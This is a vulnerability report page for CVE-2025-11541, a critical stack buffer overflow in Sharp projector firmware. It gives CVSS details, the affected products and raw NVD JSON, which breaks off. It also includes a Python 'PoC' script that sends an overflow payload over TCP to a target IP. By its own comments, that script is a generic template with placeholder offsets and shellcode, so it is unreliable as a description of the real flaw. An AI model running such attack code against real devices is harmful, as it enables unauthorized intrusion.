Security Vulnerability Report
中文
CVE-2025-11541 CVSS 9.8 CRITICAL

CVE-2025-11541

Published: 2025-12-22 05:16:16
Last Modified: 2026-01-15 20:27:08

Description

Stack-based Buffer Overflow vulnerability in Sharp Display Solutions projectors allows a attacker may execute arbitrary commands and programs.

CVSS Details

CVSS Score
9.8
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:o:sharp:np-p502h_firmware:-:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:sharp:np-p502h:-:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:o:sharp:np-p502w_firmware:-:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:sharp:np-p502w:-:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:o:sharp:np-p452h_firmware:-:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:sharp:np-p452h:-:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:o:sharp:np-p452w_firmware:-:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:sharp:np-p452w:-:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:o:sharp:np-p502hg_firmware:-:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:sharp:np-p502hg:-:*:*:*:*:*:*:* - NOT VULNERABLE
Sharp Display Solutions projectors(特定固件版本,待厂商确认)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3 # CVE-2025-11541 PoC - Sharp Projector Stack Buffer Overflow # This PoC demonstrates sending a malicious payload to trigger the buffer overflow # NOTE: This is for educational and authorized testing purposes only import socket import sys def create_malicious_payload(): """ Generate payload to trigger stack buffer overflow The actual vulnerability is in the network service handling user input """ # Target buffer size (placeholder - actual size varies by firmware version) buffer_size = 1024 # Padding to fill the buffer padding = b'A' * buffer_size # Overwrite the return address (needs to be adjusted based on firmware) # In real exploitation, this would point to shellcode or ROP gadgets return_address = b'\xAA\xBB\xCC\xDD' # Example address # Additional padding to reach saved registers additional_padding = b'B' * 64 # Optional: Shellcode for arbitrary command execution # This is a placeholder - actual shellcode depends on target architecture shellcode = b'\x90' * 16 # NOP sled payload = padding + return_address + additional_padding + shellcode return payload def send_exploit(target_ip, target_port=80): """ Send the exploit payload to the target projector """ payload = create_malicious_payload() try: print(f"[*] Connecting to {target_ip}:{target_port}") sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.settimeout(10) sock.connect((target_ip, target_port)) print(f"[*] Sending malicious payload ({len(payload)} bytes)") sock.send(payload) print("[*] Payload sent successfully") print("[*] If vulnerable, the device should trigger the buffer overflow") # Wait for response try: response = sock.recv(1024) print(f"[*] Received response: {response[:100]}") except: pass sock.close() return True except Exception as e: print(f"[!] Error: {e}") return False if __name__ == "__main__": if len(sys.argv) < 2: print(f"Usage: {sys.argv[0]} <target_ip> [port]") print("Example: python3 poc.py 192.168.1.100 80") sys.exit(1) target = sys.argv[1] port = int(sys.argv[2]) if len(sys.argv) > 2 else 80 send_exploit(target, port)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-11541", "sourceIdentifier": "[email protected]", "published": "2025-12-22T05:16:16.460", "lastModified": "2026-01-15T20:27:08.313", "vulnStatus": "Analyzed", "cveTags": [{"sourceIdentifier": "[email protected]", "tags": ["unsupported-when-assigned"]}], "descriptions": [{"lang": "en", "value": "Stack-based Buffer Overflow vulnerability in Sharp Display Solutions projectors allows a attacker may execute arbitrary commands and programs."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 9.2, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "PRESENT", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-121"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-787"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:sharp:np-p502h_firmware:-:*:*:*:*:*:*:*", "matchCriteriaId": "EA69E996-0284-4FEE-B15F-E5257A262794"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:sharp:np-p502h:-:*:*:*:*:*:*:*", "matchCriteriaId": "24783AAF-8F17-4247-88DD-B7BEE1C2DDAF"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:sharp:np-p502w_firmware:-:*:*:*:*:*:*:*", "matchCriteriaId": "EECEFD65-FFAD-4326-A712-DAB7B9B7756E"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:sharp:np-p502w:-:*:*:*:*:*:*:*", "matchCriteriaId": "E290E2BC-5FD0-43B2-BD46-F0597713AF45"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:sharp:np-p452h_firmware:-:*:*:*:*:*:*:*", "matchCriteriaId": "FEBFCC3E-DEEB-4D5E-BD7B-E2F0F106AD14"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:sharp:np-p452h:-:*:*:*:*:*:*:*", "matchCriteriaId": "20D079AC-E0F6-42D2-A19E-FE7804F28EDB"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:sharp:np-p452w_firmware:-:*:*:*:*:*:*:*", "matchCriteriaId": "E14B431A-0AA4-4434-8EB7-5E57995C1674"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:sharp:np-p452w:-:*:*:*:*:*:*:*", "matchCriteriaId": "BCEAAE7D-950E-4E54-8BED-9AA0607E8223"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:sharp:np-p502hg_firmware:-:*:*:*:*:*:*:*", "matchCriteriaId": "539A3D60-4FAF-409D-92EB-19E81FC899FC"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:sharp:np-p502hg:-:*:*:*:*:*:*:*", "matchCriteriaId": "DBE760E8-7D8D-41AC-8B02-5586A9C1810C"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2. ... (truncated)